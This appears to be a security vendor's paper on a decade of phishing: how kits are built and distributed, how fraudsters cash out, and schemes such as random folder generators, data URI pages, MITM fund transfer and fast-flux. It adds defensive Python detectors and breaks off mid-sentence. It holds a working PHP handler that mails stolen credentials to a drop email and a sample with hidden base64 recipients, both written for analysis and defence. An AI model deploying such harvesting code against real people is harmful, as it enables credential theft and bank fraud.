The document provides an overview of phishing techniques used over the past decade based on investigations by an RSA FraudAction forensic analyst. It describes how phishing campaigns are typically set up and distributed, as well as various technical methods used, including: generating random folder paths to host phishing sites and avoid detection; encoding phishing pages in email attachments or URLs; and using Man-in-the-Middle techniques to forward stolen credentials to legitimate sites behind the scenes. The document outlines common motivation and cash-out methods for phishers, such as selling stolen data or using money mules. It also discusses evolving tactics like multi-branded tax refund scams and deploying phishing sites in bulk across numerous domains and paths.
TABLE OF CONTENTS
Introduction
How to Set up a Phishing Campaign
Fundamentals
How Does Phishing Work in the Real World?
Motivation - How Do Fraudsters Cash Out?
The Many Schemes and Techniques of Phishing
The Tax Refund Ploy - Multi-branded Phishing
Bulk Phishing Campaigns
Random Folder Generators
Local HTML Scheme
BASE64 Encoded Phishing in a URL
Phishing with MITM Capabilities
Phishing Plus Mobile Malware in India
Fast-Flux Phishing
Additional Phishing Techniques
INTRODUCTION
Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have
investigated, and also explains the techniques and inner workings of some recently seen schemes.
HOW TO SET UP A PHISHING CAMPAIGN
There is nothing complicated about setting up a phishing campaign. Phishing sites, like any
website, require a hosting facility (domain, IP address, etc.) as well as a software ‘front-end’ and
‘back-end’ (HTML, PHP etc.). Anyone with a little knowledge in web-development can set up a
phishing site without a hassle. Simple phishing sites are generally simple copies of legitimate
customer login pages (front-end), where the action script (that handles the submitted
information) is different from the legitimate one. Owing to this simplicity in the preparation
process, phishing was, is, and will probably remain one of the most desirable scam techniques
performed by fraudsters.
FUNDAMENTALS
What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the
help of additional client-side scripting/markup languages such as JavaScript and CSS. These
components are responsible for presenting text, pictures, and other graphics. In addition, PHP
(Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to
perform programming tasks, and fraudsters love it! PHP is a server-side scripting language that is
relatively simple to write, and it is used by most websites today.
In every phishing site, there is an information form that victims are prompted to fill with
requested details. In HTML, forms are composed like the following example:
<form method="POST" action="getdata.php">
Username: <input type="text" name="username" /> <br/>
Password: <input type="password" name="password" /> <br/><br/>
<input type="submit" value="Login" />
</form>
The example login form above contains two data fields: Username and Password, defined by the
input tag. The third input has a type defined as submit with a value defined as Login – this means
that it will appear on the login screen as a submit button labeled Login. The form tags at the
beginning and end of the script define a form with these fields. The form tag attributes method
and action determine how the data is going to be handled when the victim clicks the Login button –
the data will be submitted to the getdata.php handling script via an HTTP POST request.
How do fraudsters usually prepare all of the above? They copy the HTML source code of a
legitimate site’s pages, and change the action attribute to a script they’ve written (usually in
PHP). The easiest method is simply to take the submitted data and forward it to the fraudster’s
email address (a.k.a. the drop email). Here’s an example of a getdata.php script:
<?php
// Read the two fields submitted by the cloned login form
$username = $_POST['username'];
$password = $_POST['password'];
$message = "-----[Best HaXoR Ever]-----\n";
$message .= "Username: $username\n";
$message .= "Password: $password\n";
$message .= "-----[Best HaXoR Ever]-----\n";
$subject = "Phished data";
// Forward the captured credentials to the fraudster's drop email address
mail("besthaxor@dropemail.com", $subject, $message);
?>
Although most phishing sites still work in this simplified manner, during the last decade we’ve
seen more advanced phishing techniques develop and evolve.
HOW DOES PHISHING WORK IN THE REAL WORLD?
Being a simple way to commit fraud, phishing usually doesn’t attract sophisticated threat actors. In
some cases, they don’t even possess any programming knowledge. Phishing sites are commonly
distributed in underground forums as ‘kits’ packaged as archive files (ZIP, RAR, etc.) that contain
all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop
emails in the relevant files of the kit. It is very comfortable and easy for them to use. However,
distributors or kit developers don’t spend their precious time just to make their ‘clients’ the
fraudsters happy. Many of the kits we have investigated contain hidden or obfuscated code that
forwards the stolen data back to the kit’s author as well as to the end-user fraudster. So, for
example, if 100 fraudsters use these ‘infected’ kits distributed by a single kit author, he stands to
harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online
100 times himself.
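As an added example (not RSA’s tooling and not code from a real kit), here is a triage script a defender or forensic analyst can run over a captured kit’s login page and PHP handler: it reports where the cloned form posts, and every drop address the handler mails to, including the extra recipients a kit author hides behind base64 or string concatenation as described above. The kit sources it scans are constructed samples built around the getdata.php pattern shown earlier.

```python
import base64
import re

# Constructed sample of a kit's login page and its handler (not a real kit):
# the handler mails credentials to the visible drop address and to two
# further recipients the kit author hid, as the text describes.
SAMPLE_LOGIN_HTML = '''<form method="POST" action="getdata.php">
Username: <input type="text" name="username" /> <br/>
Password: <input type="password" name="password" /> <br/>
<input type="submit" value="Login" />
</form>'''

SAMPLE_HANDLER_PHP = r'''<?php
$username = $_POST['username'];
$password = $_POST['password'];
$message = "Username: $username\nPassword: $password\n";
$subject = "Phished data";
mail("besthaxor@dropemail.com", $subject, $message);
// planted by the kit author: recipient hidden behind base64
$k = base64_decode("a2l0YXV0aG9yQGV4YW1wbGUubmV0");
mail($k, $subject, $message);
// a second hidden copy, assembled from fragments so a grep for '@' misses it
$x = "resel" . "ler@" . "example" . ".org";
mail($x, $subject, $message);
?>'''

_STRING = re.compile(r'''(["'])(.*?)\1''')
_ASSIGN = re.compile(r'(\$\w+)\s*=\s*(.+?);')
_MAIL = re.compile(r'\bmail\s*\(\s*([^,]+?)\s*,')
_B64 = re.compile(r'base64_decode\s*\(\s*(.+?)\s*\)')
_EMAIL = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')

def _split_concat(expr):
    """Split on PHP's '.' concatenation operator, ignoring dots inside quotes."""
    parts, buf, quote = [], [], None
    for ch in expr:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in '"\'':
            quote = ch
            buf.append(ch)
        elif ch == '.':
            parts.append(''.join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf))
    return parts

def _resolve(expr, assignments, depth=0):
    """Statically evaluate the PHP subset kits use to build a recipient (string
    literals, '.' concatenation, $var lookups, base64_decode); None if unknown."""
    if depth > 8:  # guard against circular assignments such as $a = $a
        return None
    expr = expr.strip()
    m = _B64.fullmatch(expr)
    if m:
        try:
            return base64.b64decode(_resolve(m.group(1), assignments, depth + 1),
                                    validate=True).decode('utf-8')
        except (TypeError, ValueError, UnicodeDecodeError):
            return None
    parts = []
    for piece in _split_concat(expr):
        piece = piece.strip()
        if piece.startswith('$'):
            if piece not in assignments:
                return None  # runtime value (e.g. $_POST), not recoverable
            val = _resolve(assignments[piece], assignments, depth + 1)
        else:
            lit = _STRING.fullmatch(piece)
            val = lit.group(2) if lit else None
        if val is None:
            return None
        parts.append(val)
    return ''.join(parts)

def drop_addresses(php_source):
    """Every recipient the handler mails to, in mail() call order."""
    assignments = dict(_ASSIGN.findall(php_source))
    return [_resolve(arg, assignments) or f'<unresolved: {arg}>'
            for arg in _MAIL.findall(php_source)]

def hidden_recipients(php_source):
    """Recipients absent as plain e-mail literals: the kit author's planted copies."""
    visible = set(_EMAIL.findall(php_source))
    return [a for a in drop_addresses(php_source) if a not in visible]

def form_actions(html_source):
    """The 'action' target of every <form>: where the cloned login page posts."""
    return re.findall(r'<form\b[^>]*\baction\s*=\s*["\']([^"\']*)["\']',
                      html_source, re.I)

if __name__ == '__main__':
    print('form posts to:', form_actions(SAMPLE_LOGIN_HTML))
    print('all drop addresses:', drop_addresses(SAMPLE_HANDLER_PHP))
    print('hidden from a plain grep:', hidden_recipients(SAMPLE_HANDLER_PHP))
```

An address that resolves to a value not present in the kit’s configuration file is the one to blocklist first, since it is the recipient the kit’s user never knew about.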
Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to
make it available online. Here are two commonly used options for deployment:
Use a hacked website
Buy a site/domain
The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either
hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of
such a site provides the fraudster with a link to a ‘backdoor’ script (also written in PHP), also
known as a shell, that allows them to control and manage the site, uploading and deploying the
phishing kit resources.
When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to
distribute it to potential victims. Distribution of phishing URLs is commonly performed via email
messages. However, occasionally fraudsters can be more creative and use additional distribution
vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of email
addresses are traded and sold in underground forums, and often the price depends on how good
that list is. For example, how close a match there is between the email addresses of people from a
geographic area that matches the targeted entity, and how many of them are active or online, can
affect the price. If fraudster is targeting a British bank, a verified active email address owned by
British citizens will fetch a higher price.
MOTIVATION - HOW DO FRAUDSTERS CASH OUT?
Not every financial institution becomes a fraudster’s target. The main qualifying factor is a
security flaw in the target site and/or the ease of cashing out or monetizing the phishing process.
For example, knowing that phished PII (Personally Identifiable Information) such as mother’s
maiden name and date of birth, tied together with other personal details, can help in transferring
money out of a victim’s account will definitely draw a scammer’s attention.
Another option is for fraudsters to sell the stolen data in the underground rather than trying to
cash out the scam themselves. This also offers the advantage of not drawing attention from law
enforcement authorities and company security departments. The buyers are usually people who
are well versed in how to cash out and are also willing to take on the risks involved. One more
option is fraudsters collaborating with ‘money mules’. The money is transferred to a ‘mule’
account, and the money mule cashes it out for a fee. After the transfer is done, the mule goes to
an ATM, withdraws the stolen money, and sends it back to the first fraudster via a money transfer
service (Western Union, MoneyGram, etc.). Another cash-out scheme is purchasing various
products online using stolen credentials and then reselling the items. These are just a few
examples of common cash-out techniques.
THE MANY SCHEMES AND TECHNIQUES OF PHISHING
THE TAX REFUND PLOY - MULTI-BRANDED PHISHING
One phishing scam that phishers love to use is to bait victims with a supposed tax refund
notification via email, pretending to come from the official government tax/revenue service of
one of several countries. When victims follow the link, they see a phishing website that has the
same look and feel as the legitimate revenue service site of their country, with a list of all the
banks in that region. The victim is prompted to select their bank and enter personal information
in order to receive a refund. This ploy enables fraudsters to steal data from the customers of
several banks at once and increase their fraud coverage.
BULK PHISHING CAMPAIGNS
Another popular trend is performing phishing campaigns in bulk. Rather than deploying a single
phishing website whose URL is then sent to victims, fraudsters deploy many copies and distribute
the URLs randomly among the phishing emails. This tactic increases the phishing sites’ lifespan
and makes the detection and shutdown process harder. Unlike a usual phishing site, where the
scammers use one or two hijacked websites to deploy a phishing kit, the bulk scheme can
encompass dozens of hijacked websites with several phishing directories on each one, resulting
in hundreds of phishing websites. For example:
http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hkj3k7/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/57askv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/loinc2/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/4jvrgr/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/mnjnde/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hm37lj/phishing_site/login.html
Here is a generic example. The initial link in the phishing email looks like this:
http://somesite.net/folder1/folder2/index.php
The PHP code in the snapshot below is an example of a random folder-generating script.
index.php is a PHP script that creates a randomly named folder and copies all the required
resource files from the phishing kit (HTML, JS, CSS, images, etc.) into it; a new folder is created
for each victim access. In some cases, instead of creating a new folder, the index.php script
extracts these files from a ZIP archive sitting in the ‘base’ directory of the phishing campaign and
deploys them as is, using the name of the archive folder.
[Code snapshot annotations: random name generating function; randomize the name some more;
log every access to a file, including IP, date, and browser type; file copying function; base
directory, whose contents are copied from here; copy the contents to the generated folder and
redirect to it]
Flow of the folder-generating scheme:
Phishing email • Victim follows a folder-generating URL
Folder-generating script • New randomly-named folder is generated • Required files are copied
from base directory to new folder • Victim is redirected to newly generated URL
Newly generated folder • Phishing site is presented to victim
This scheme is simple to operate, but it complicates detection and shutdown efforts much like the
other schemes described here. When one randomly deployed phishing URL is detected, it might be
deleted within minutes, which can mislead security personnel into thinking that the site has been
brought down. In actual fact, the site remains active and online, simply waiting for a new victim
to access the initial link. In order to handle these cases effectively, it is crucial to detect and
shut down the ‘base’ directory (or archive) that contains the initial phishing site and resources.
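To illustrate that takedown advice from the defender’s side, here is an added Python example (not part of this paper) covering both the bulk scheme and the folder-generating scheme: given reported phishing URLs, it finds the directory shared by all reports on a host, which is the ‘base’ directory worth shutting down, counts the generated folders beneath it, and groups hosts that carry the same kit layout so that a campaign spread over many hijacked sites is handled as one. The first four URLs are the page’s own bulk example; the hosts on the .example TLD are assumed, one of them showing the variant (described later in the paper) where the generated folder also gets a random parent directory, in which case no shared base exists and the whole host or hosting account has to be addressed.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed report list. The examplesite1.com URLs are from the page's bulk
# example; the .example hosts are assumed to show the two other layouts an
# analyst meets: generated folders under random parents, and a single report.
REPORTED_URLS = [
    "http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html",
    "http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html",
    "http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html",
    "http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html",
    "http://examplesite2.example/k3j9x/phishing_site/login.html",
    "http://examplesite2.example/p0q2r/phishing_site/login.html",
    "http://examplesite3.example/images/phishing_site/login.html",
]


def split_path(url):
    """Return (directory segments, file name) of a URL's path."""
    parts = [p for p in urlsplit(url).path.split("/") if p]
    if not parts:
        return [], ""
    return parts[:-1], parts[-1]


def common_prefix(seq_lists):
    """Longest list of leading segments shared by every list."""
    prefix = []
    for column in zip(*seq_lists):
        if any(s != column[0] for s in column):
            break
        prefix.append(column[0])
    return prefix


def cluster_by_base(urls):
    """Per host: the deepest directory shared by all reports (the candidate
    'base' directory to take down) and how many generated folders sit under it.
    A base_path of '/' means the generated folders have random parents too, so
    there is no single base directory and the whole host/account must be treated."""
    by_host = defaultdict(list)
    for u in urls:
        by_host[urlsplit(u).netloc.lower()].append(u)
    summary = {}
    for host, group in by_host.items():
        dir_lists = [split_path(u)[0] for u in group]
        base = common_prefix(dir_lists)
        # the segment directly below the shared base is the generated one
        first_variant = {tuple(d[len(base):len(base) + 1]) for d in dir_lists}
        summary[host] = {
            "base_path": "/" + "".join(seg + "/" for seg in base),
            "reports": len(group),
            "generated_folders": len(first_variant),
        }
    return summary


def group_by_kit_signature(urls):
    """Group hosts by (innermost directory, file name): identical kit layouts
    across many hijacked hosts are one campaign, not dozens of unrelated sites."""
    groups = defaultdict(set)
    for u in urls:
        dirs, fname = split_path(u)
        groups[(dirs[-1] if dirs else "", fname)].add(urlsplit(u).netloc.lower())
    return {sig: sorted(hosts) for sig, hosts in groups.items()}


if __name__ == "__main__":
    for host, info in cluster_by_base(REPORTED_URLS).items():
        print(host, info)
    print(group_by_kit_signature(REPORTED_URLS))
```

The shared base path, not the individual generated folder, is what goes into the takedown request; when the signature grouping shows the same layout on several hosts, the reports can be sent out as one campaign.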
LOCAL HTML SCHEME
The phishing scheme that is commonly called ‘Local HTML’ involves an HTML file that is attached
to an email message. Victims are prompted to open it and fill out their personal data. The
phishing site contents are placed in a single HTML file (except for the data handling script and
drop point URL that are incorporated in the form tag action attribute described earlier). The script
can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website.
In both cases, the data is usually sent to the fraudster’s drop email.
Below is a snapshot of part of a Local HTML file’s contents (the form) with a remote drop point URL.
From a cyber-security perspective, it may be difficult to shut down the site when the drop script is
hosted on a hijacked website, as it doesn’t present any abusive content when it is viewed (a blank
page is normally displayed), causing hosting facilities to think it is offline. On the other hand,
online form services are more cooperative in shutting down fraudster accounts.
BASE64 ENCODED PHISHING IN A URL
Most major browsers today support a feature called the data URI scheme. This feature allows the
entire content of a webpage to be BASE64-encoded into a string that appears in the browser
address bar. Fraudsters like using this encoding feature in the Local HTML phishing scheme as well
as in regular online-hosted phishing. When hosted online, it helps scammers conceal the main
phishing URL. The data URI is injected into the address bar using JavaScript’s window.location
property or an HTML meta refresh.
The screenshot below shows the data URI as it appears in the address bar.
This is an example of the script for injecting the data URI into the browser address bar.
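The following Python script is an added example (not from this paper) of the check a mail gateway or an analyst can apply to both the Local HTML scheme and the data URI scheme just described: it parses an HTML attachment, reports any form with a password field whose action points at a remote host (the remote drop point), and finds base64 HTML data URIs in a meta refresh or in script text, decoding and inspecting the embedded page as well. The sample documents, the drop host drop.example and the handler path are constructed for the example.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Matches a base64 HTML data URI wherever it appears (meta refresh content, script text).
DATA_URI_RE = re.compile(r"data:text/html(?:;charset=[\w-]+)?;base64,([A-Za-z0-9+/=]+)", re.I)


class _Collector(HTMLParser):
    """Collects forms (action and whether they ask for a password), meta-refresh
    targets and inline script text from one HTML document."""

    def __init__(self):
        super().__init__()
        self.forms, self.meta_refresh, self.script_text = [], [], ""
        self._form, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh.append(a.get("content", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text += data


def inspect_html(html, depth=0, max_depth=3):
    """Findings for one HTML document (e.g. an email attachment):
    ('remote_credential_form', host) for a form with a password field whose action
    is an absolute URL, and ('data_uri_redirect', where) for a base64 HTML data URI
    in a meta refresh or script; the decoded page is inspected recursively."""
    findings = []
    p = _Collector()
    p.feed(html)
    p.close()
    for f in p.forms:
        host = urlsplit(f["action"]).netloc
        if host and f["has_password"]:
            findings.append(("remote_credential_form", host))
    sources = [("meta-refresh", t) for t in p.meta_refresh] + [("script", p.script_text)]
    for where, text in sources:
        for blob in DATA_URI_RE.findall(text):
            try:
                inner = base64.b64decode(blob).decode("utf-8", "replace")
            except ValueError:
                continue
            findings.append(("data_uri_redirect", where))
            if depth < max_depth:
                findings.extend(inspect_html(inner, depth + 1, max_depth))
    return findings


# Constructed samples (not taken from any real kit). The inner page is a bare form
# posting to an assumed drop host; the wrappers use the two injection methods named above.
_INNER = ('<html><body><form method="post" action="http://drop.example/handler.php">'
          '<input name="user"><input type="password" name="pass"></form></body></html>')
_BLOB = base64.b64encode(_INNER.encode()).decode()
SAMPLE_META_REFRESH = ('<html><head><meta http-equiv="refresh" content="0;url=data:text/html;base64,'
                       + _BLOB + '"></head><body></body></html>')
SAMPLE_SCRIPT = ('<html><body><script>window.location="data:text/html;base64,'
                 + _BLOB + '";</script></body></html>')
SAMPLE_BENIGN = '<html><body><form action="/login"><input type="password" name="p"></form></body></html>'

if __name__ == "__main__":
    for name, doc in [("meta", SAMPLE_META_REFRESH), ("script", SAMPLE_SCRIPT), ("benign", SAMPLE_BENIGN)]:
        print(name, inspect_html(doc))
```

Because the decoded page is inspected too, an attachment that only redirects to a data URI is still reported for the credential form it carries, which is the case the address-bar screenshot above illustrates.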
PHISHING WITH MITM CAPABILITIES
Phishing schemes with Man-in-the-Middle (MITM) capabilities are more sophisticated than most and
provide fraudsters with more accurate harvested credentials, since these can be validated against
the legitimate site. Phishing with MITM means that while the victim is interacting with a phishing
site, behind the scenes and invisible to the victim, the phishing site communicates with and
performs actions on the legitimate site. This capability is typically implemented with PHP’s cURL
module, which is used to transfer data over various protocols including HTTP. To develop a script
that imitates the user’s actions on a legitimate site, some reverse engineering is required on the
part of the fraudster to understand which requests and data must be forwarded to the legitimate
site.
Below is a code sample illustrating the cURL object used for communicating with the legitimate
online-banking site.
The script in the snapshot below is a cURL class used for communicating with the legitimate online
banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080).
The config.php in the snapshot below contains the fraudster’s account used to receive the stolen
funds transfer.
Another part of the phishing script, seen below, uses the cURL object to transfer funds from the
victim’s account to the fraudster’s account ($cuenta_destino is defined in the config.php shown
above).
The MITM phishing scheme offers a fraudster many advantages – the fraudster can:
Log in to the legitimate site to check the validity of stolen credentials
Browse the victim’s account after login to view the account balance
Grab additional personal information such as phone number, address, etc.
In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing
site’s original IP address and to use an IP address in the desired country, matching the victim’s
locale. This results in a low profile in the logs of fraud monitoring systems, which flag suspicious
activity when actions carried out on the legitimate site are detected as originating from a region
other than the customer’s or the financial institution’s locale. Moreover, there are cases where
the phishing kit checked the victim’s account balance and, when it was higher than a given
amount, transferred the funds to a ‘mule’ account at the same bank through the legitimate site.
These kits/phishing sites are relatively rare, as they require higher-level coding skills and reverse
engineering of the legitimate websites.
In the best-case scenario, MITM phishing only steals valid credentials. In the worst-case scenario,
the funds in the account are transferred out almost instantly, making it a very serious threat in
cyberspace.
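As an added example (not this paper’s code, and not any bank’s rule set), the Python below shows detection logic a fraud monitoring team can run over bank-side session events once the geolocation check has been neutralised by a proxy: it scores sessions on signals the kit cannot borrow from the victim, namely a transfer to a payee the customer has never used and a transfer within seconds of login, while treating the device fingerprint only as a weak signal. The event log, customer ids, payee identifiers, fingerprints and weights are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed bank-side event log: (customer, ISO time, source IP, device fingerprint,
# action, detail). Customer c1's session is the shape an automated MITM kit produces:
# log in, read the balance, transfer to a never-seen payee, all within seconds, from a
# fingerprint copied from the victim (so a device check alone passes). c2 is normal use.
EVENTS = [
    ("c1", "2024-01-15T10:00:00", "203.0.113.5", "fp-a1", "login", ""),
    ("c1", "2024-01-15T10:00:03", "203.0.113.5", "fp-a1", "balance", ""),
    ("c1", "2024-01-15T10:00:08", "203.0.113.5", "fp-a1", "transfer", "acct-9999"),
    ("c2", "2024-01-15T11:00:00", "198.51.100.7", "fp-b2", "login", ""),
    ("c2", "2024-01-15T11:04:00", "198.51.100.7", "fp-b2", "balance", ""),
    ("c2", "2024-01-15T11:09:30", "198.51.100.7", "fp-b2", "transfer", "acct-1234"),
]
KNOWN_PAYEES = {"c1": {"acct-1111"}, "c2": {"acct-1234"}}
KNOWN_DEVICES = {"c1": {"fp-a1"}, "c2": {"fp-b2"}}

# Constructed weights: the signals a proxy and a copied fingerprint cannot hide score highest.
WEIGHTS = {"new_payee": 40, "transfer_within_60s_of_login": 40, "unknown_device": 20}


def split_sessions(events):
    """Group events per customer and cut a new session at every login."""
    by_customer = defaultdict(list)
    for e in events:
        by_customer[e[0]].append(e)
    result = []
    for customer, evs in by_customer.items():
        current = None
        for e in sorted(evs, key=lambda e: e[1]):
            if e[4] == "login":
                current = []
                result.append((customer, current))
            if current is not None:
                current.append(e)
    return result


def session_reasons(customer, evs, known_payees, known_devices,
                    fast_window=timedelta(seconds=60)):
    """Sorted list of risk reasons observed in one session."""
    reasons = set()
    login_at = datetime.fromisoformat(evs[0][1])
    for _, when, _, device, action, detail in evs:
        if device not in known_devices.get(customer, set()):
            reasons.add("unknown_device")
        if action == "transfer":
            if detail not in known_payees.get(customer, set()):
                reasons.add("new_payee")
            if datetime.fromisoformat(when) - login_at <= fast_window:
                reasons.add("transfer_within_60s_of_login")
    return sorted(reasons)


def flag_sessions(events, known_payees, known_devices, threshold=60):
    """Sessions whose weighted reasons reach the threshold: {(customer, login time): (score, reasons)}."""
    flagged = {}
    for customer, evs in split_sessions(events):
        reasons = session_reasons(customer, evs, known_payees, known_devices)
        score = sum(WEIGHTS[r] for r in reasons)
        if score >= threshold:
            flagged[(customer, evs[0][1])] = (score, reasons)
    return flagged


if __name__ == "__main__":
    print(flag_sessions(EVENTS, KNOWN_PAYEES, KNOWN_DEVICES))
```

The point of the weighting is that source country and fingerprint are exactly what the proxy and the statistics collection described in this paper let the kit imitate, whereas payee novelty and login-to-transfer velocity are properties of the fraud itself.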
PHISHING PLUS MOBILE MALWARE IN INDIA
Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The
Tax Refund scheme described earlier, which operates via a spoofed government revenue service
site, was recently modified to include an SMS message sent to the victim’s phone at the end of
the phishing process. The SMS contains a link that downloads and deploys a malicious APK
(Android mobile malware archive).
This new ploy makes use of a number of the schemes and techniques described earlier, including a
random folder generator, a BASE64 data URI, the tax-refund scheme, and more. The link provided
in the phishing emails leads victims to a redirection URL (implemented via the BASE64 data URI).
That URL leads to an outer-frame site, which uses a script that communicates with a remote SQL
database to retrieve the inner-frame URL.
Flow of the combined scheme:
Phishing email • Victim clicks on redirection link
Redirection • Victim is redirected to outer-frame URL • The redirecting source code is obfuscated
with unescape • Redirecting code executes using data URI
Outer-frame • Communicates with SQL database to get inner-frame URL • Presents inner-frame
hosted on a URL different from the outer-frame
Inner-frame (folder-generator) • Randomly named folder is generated in a random parent
directory • Victim is redirected to the new folder
Phishing site • Victim is prompted to select a bank • Victim is prompted to enter personal data
including phone number • Compromised data is sent to remote drop URL
Victim receives short-URL link via SMS • The link leads to a URL for downloading the malicious
Android application • Once the APK is installed, the victim’s data on the smartphone is
compromised
The snapshot below shows part of the outer-frame code – communicating with a remote SQL
database.
The inner-frame phishing URL generates a random folder in a random parent directory, which is
different from the usual folder-generators that create a new folder under the same path. The
phishing site prompts the victims to choose their bank from a long list of Indian banks to begin
the ‘tax-refund’ process. The image below shows the bank selection screen in the phishing site.
The kit uses a configuration file containing URLs for the resources needed by the phishing site:
A URL that provides all of the images needed to spoof the legitimate site, instead of grabbing
the images from the legitimate site, which could trigger detection
A drop URL that receives and logs stolen data
A URL with the SMS sending script for the malicious APK
A short URL that is sent to victims
The last page file that victims see at the end of the phishing process
The code snapshot below is an example of the phishing site configuration file.
Once the victim finishes going through all the phishing pages, the folder is deleted. To add further
spice to this scheme, upon entering their phone number in this site, the victim receives an SMS
message with a link prompting the download of a malicious APK file (Android application) under
the pretense of ‘mobile verification’.
The random URL generation, where links are deleted and created per victim, complicates detection
and shutdown by cyber security services. The impact of this trend goes beyond ‘regular’ phishing,
since at the end of the process the victim’s phone is infected with a malicious application. That
mobile malware application keeps on stealing data from the phone long after the personal data
has been phished via a simple phishing site. Since many banks today employ two-factor
authentication using SMS messages for online banking, this malicious app can be even more
harmful, giving the fraudster control over the phone and thus over the second authentication
channel.
FAST-FLUX PHISHING
One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated is
commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late). These
are usually phishing sites hosted on Fast-Flux networks: phishing attack domains that resolve to
multiple IP addresses, which are changed randomly over a period of minutes. Therefore, in order
to bring down these attacks, our analysts can only contact the registrars, as contacting the
ISP/hosting provider would not address the root problem. Domains are often generated
automatically in this scheme for the sole purpose of hosting phishing and malware. Each domain
contains dozens of URLs targeting several entities, making campaigns very profitable for the
scam authors.
Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets of
infected ‘zombie’ computers. It relies on DNS records with a short TTL in order to rotate the IP
addresses.
This scheme is not as common recently as it was in the past.
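Here is an added Python example (not from this paper) of the DNS-based check used to recognise a fast-flux domain from repeated lookups: it counts distinct addresses and distinct /16 networks (a stand-in for ASN diversity when no ASN data is at hand), records the smallest TTL, and computes a ‘fluxiness’ ratio of all addresses ever seen to the addresses returned per lookup. The lookup history, the thresholds and the placeholder addresses from 10.0.0.0/8 are constructed for the example; the thresholds must be tuned on real resolver data, since large CDNs also use short TTLs.

```python
import ipaddress
from collections import defaultdict

# Constructed lookup history: (domain, seconds since first lookup, TTL, A records).
# Addresses are placeholders from 10.0.0.0/8. The suspect domain returns a fresh set
# scattered across many /16s on every lookup; the CDN-like domain returns the same two.
OBSERVATIONS = [
    ("suspect.example", 0, 300, ["10.11.1.5", "10.42.7.9", "10.88.3.2"]),
    ("suspect.example", 300, 300, ["10.120.9.14", "10.7.33.1", "10.200.5.8"]),
    ("suspect.example", 600, 300, ["10.65.2.21", "10.13.77.4", "10.150.0.9"]),
    ("cdn.example", 0, 60, ["10.5.5.1", "10.5.5.2"]),
    ("cdn.example", 60, 60, ["10.5.5.2", "10.5.5.1"]),
]


def summarize(observations):
    """Per domain: all addresses seen, their /16 networks, answer sizes, minimum TTL,
    and how often the answer set changed between consecutive lookups."""
    stats = defaultdict(lambda: {"ips": set(), "nets": set(), "answer_sizes": [],
                                 "min_ttl": None, "changes": 0})
    previous = {}
    for domain, _, ttl, ips in sorted(observations, key=lambda o: (o[0], o[1])):
        s = stats[domain]
        s["ips"].update(ips)
        s["nets"].update(str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips)
        s["answer_sizes"].append(len(ips))
        s["min_ttl"] = ttl if s["min_ttl"] is None else min(s["min_ttl"], ttl)
        if domain in previous and set(ips) != previous[domain]:
            s["changes"] += 1
        previous[domain] = set(ips)
    return stats


def flux_report(observations, max_ttl=600, min_ips=5, min_nets=3):
    """Score each domain; 'fluxiness' is distinct addresses over the average answer
    size (1.0 means every lookup returns the same hosts). Thresholds are constructed."""
    report = {}
    for domain, s in summarize(observations).items():
        avg_answer = sum(s["answer_sizes"]) / len(s["answer_sizes"])
        fluxiness = len(s["ips"]) / avg_answer
        report[domain] = {
            "distinct_ips": len(s["ips"]),
            "distinct_slash16": len(s["nets"]),
            "min_ttl": s["min_ttl"],
            "answer_changes": s["changes"],
            "fluxiness": round(fluxiness, 2),
            "fast_flux_suspect": bool(s["min_ttl"] <= max_ttl and len(s["ips"]) >= min_ips
                                      and len(s["nets"]) >= min_nets and fluxiness > 1.0),
        }
    return report


if __name__ == "__main__":
    for domain, r in flux_report(OBSERVATIONS).items():
        print(domain, r)
```

A domain flagged this way is the stable element of the attack, which is why the text above sends takedown requests to the registrar rather than to the hosting providers behind the rotating addresses.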
ADDITIONAL PHISHING TECHNIQUES
In addition to the more notable and prevalent phishing schemes we have described, there are a
